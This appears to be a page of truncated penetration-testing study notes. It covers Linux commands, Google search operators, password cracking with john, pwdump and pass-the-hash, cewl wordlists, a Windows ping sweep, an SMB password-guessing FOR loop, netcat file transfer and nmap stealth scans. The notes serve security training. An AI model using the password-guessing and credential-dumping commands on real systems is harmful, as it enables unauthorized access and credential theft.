nagpentest

>useradd -d /home/fred fred >system-config-users >id <username> = to list the id number for the user/group >passwd >whoami > sh <root_username> > linux file system structure = 2 b added > ls -la = diferent color means diferent things = 2 be added. > how to mount cdrom or flash drive = 2 b added > locate <program_name> > find / -name <file_to_look_for>..find / -name ls &...runs in the background using the & after the cmd intervention > less <file_to_see_the_content_of>; ls /dev | less > echo $PATH > which ls = u can c where ls commands are being run from > ps aux | less or top > bg or fg = to start the program in  the background or foreground > jobs = to list all process running in the background > gedit /etc/sysconfig/network-scripts/ifcfg-eth0 > service network restart > netstat -nap | less = show listeining ports; > /usr/sbin/lsof -i |  less = li...

Google searches are case insenstive.   site: search only within the given domain. If you include site: in your query, Google will restrict your search results to the site or domain you specify. For example, [  admissions site:www.lse.ac.uk  ] will show admissions information from London School of Economics’ site and [  peace site:gov  ] will find pages about peace within the .gov domain. You can specify a domain with or without a period, e.g., either as .gov or gov . OR[  site:www.lse.ac.uk   admissions ] OR [  site:www.lse.ac.uk filetype:ppt ] will look for all ppt files in that particular site OR [site:abcd.net ppt] will not only get ppt but also web pages that include the text ppt.   link: Shows all sites linked to a fiven site. The query link: URL shows pages that point to that URL . For example, to find pages that point to Google Guide’s home page, enter: [  link:www.googleguide.com  ] related: Shows similar pages. The quer...

======================================== book 4 pg 165; file 4.6 31:37 * if u have no access to hashes, u may want to consider pwd guessing (using tools like thc-hydra) or sniffing clear text or challenge/response exchange (e.g, cain, tcpdump, etc) * if u have hashes & want to crack the pwd -for salted hash from unix like, use tradional pwd cracking (john ripper) -for lanman, nt hash from windows, use rainbow tables, or tradtional pwd cracking (john or cain) * if you have lanman challenge/response ntlm1 or ntlm2 catures use pwd cracking (cain) * if u have lanman. nt hash and smbaccess use pass the hash ======================================== file 4.4 3:52 minute Pwdump tools a. pwdump3 to pwdump6 b. fgdump c. pwdump7 ======================================== john * john.pot file = when john cracks a pwd, it displays the result on the screen and stores it in the john.pot file. John will not load pwd that it has alre...

file 4.2, 25.40 minute tested... #cewl www . ignitetechnologies . in - d 2 - w / root / Desktop / dict . txt cewl <url> -d<depth> -w<path> Cewl – indicated the tool which is being used <url> – here give the URL that you want to use as a foundation of your dictionary. -d<depth> – here, give the number of links you want it to go through while creating your dictionary. -w<path> – here, give the path where you want to store all the possible passwords. For example in the terminal of kali type :[source: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing/] $ mkdir /tmp/source $ cd /tmp/soruce $ wget -r -1 [N] [target_website] $ cd.. $ grep -h -r "" source | tr '[:space:]' '\n' | sort | uniq > wordlist.lst $ grep -v '<' wordlst.lst > newlist.lst -r pulls recursive pages from the target website, following links to a depth of N (-1) pages. grep to omit file names  from the ou...

>>  FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply" --> is a ping sweep >>  FOR /f %i in (password.lst) do @echo %i & @net use file://target_ip_addr/ %i /u:[username] 2>nul &&  pause --> password guess; instead of pause, we could append our results to a file with : && echo Username: %i >> success.txt >>  FOR /L %i in (1,1,255) do echo %i & ping -n 5 127.0.0.1 & cls --> [command1] & [command2] --> run multiple commands [command1] && [command2] --> run multiple commands only if the prior command is succeeded without error u could use the echo cmd to build a script line by line by running the following cmd several times, varying the line each time you run it c:\ echo [line] << file.bat The FOR loop variable must be changed from %[var] to %%[var] to make in a batch file. Place 2 %age sign infront of each vaiable name ========================= windows>for /L %...

how to move files between 2 systems using nc. works on both linux and windows. on source/sending machine      #nc --lvp 2222 < sending_this_file.txt on target/receiving machine     #nc -nv target_ip_address 2222  > receiving _this_file.txt Building off of the previous example, we can accomplish more useful tasks. Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages that are typed in by a user. We can use this knowledge to turn netcat into a file transfer program. Once again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as we did in the last example, we will place all of the information straight into a file: netcat -l 4444 > received_file On the second computer, create a simple text file by typing: echo "Hello, this is a file" > ...

Nmap scripts will cause nmap to do a port scan so they can find out which ports are open but nmap scipts without a version scan may not properly measure the target's configuration and vulnerabilities specially for services on non-configuration. By default nmap will check the top 100 most used ports for TCP/and or UDP # nmap -PN -sS target_ip_address -p 1-1024 --packet-trace  [ PN = indicates that we dont want to ping the target system, just scan it ;      sS   = do a SYN scan also known as stealth scan or half open scan ;     -p = list of the ports to scan ;      --packet-trace = makes nmap display the status and packet summary information      -PB   = same as default; use ICMP Echo Request; SYN to TCP 433; ACK to TCP 80, and ICMP Timestamp request (if UID 0)      -PE   = formerly -PI; send ICMP echo request (ICMP type 8)     ...